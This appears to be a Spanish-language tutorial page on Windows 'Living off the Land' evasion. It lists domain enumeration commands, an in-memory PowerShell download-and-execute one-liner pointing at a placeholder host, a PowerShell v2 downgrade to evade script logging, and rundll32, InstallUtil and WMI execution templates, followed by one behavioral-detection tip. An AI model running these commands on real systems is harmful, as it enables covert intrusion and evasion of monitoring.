Evasión de defensas

LOLBins: Living off the Land

Cómo un atacante enumera el dominio y ejecuta código con binarios de Windows ya firmados, en vez de traer sus propias herramientas.

Qué es

Living off the Land usa las herramientas que ya trae Windows, en vez de subir las propias. El atacante enumera el dominio y ejecuta código con binarios firmados por Microsoft. Su actividad se confunde con administración normal y esquiva las defensas por firma.

Cómo funciona

Windows trae una superficie administrativa amplia: PowerShell, WMI, net y dsquery consultan el host, la red y Active Directory sin traer código nuevo. Los binarios de ejecución (rundll32.exe, installutil.exe) están firmados por Microsoft y viven en C:\Windows. AppLocker permite por defecto lo que está en esa carpeta, y la firma de Microsoft aporta confianza. El binario de confianza corre la carga. En el árbol de procesos, la acción parece salir de un componente normal de Windows. No hay binario nuevo que detectar, así que la detección por firma o por lista de permitidos no dispara.

Diagrama

Comandos

Enumerar el host y el dominio sin traer herramientas:

systeminfo
net user /domain
net group "Domain Admins" /domain
dsquery user -limit 0
wmic computersystem get domain,name

Descargar y ejecutar en memoria con PowerShell:

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<FILE>')"

Bajar a PowerShell v2 para esquivar el registro de bloques de script:

powershell -version 2 -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<FILE>')"

Ejecutar un DLL del atacante con rundll32.exe, donde <FUNC> es la función exportada:

rundll32.exe <FILE>,<FUNC>

Ejecutar código con installutil.exe por el método Uninstall:

InstallUtil.exe /logfile= /LogToConsole=false /U <FILE>

Ejecución remota con WMI:

wmic /node:<HOST> /user:<DOMAIN>\<USER> process call create "<FILE>"

Cómo defenderse

Detecta por comportamiento: rundll32 o installutil que lanzan una shell o abren una conexión de red son sospechosos aunque tengan firma válida.

Siguiente

Puedes seguir leyendo aquí:

Evasión de defensasOfuscación de comandos y scripts

No te pierdas ninguna noticia

Recibe un correo cuando haya alguna actualización importante.

Al suscribirte aceptas la política de privacidad.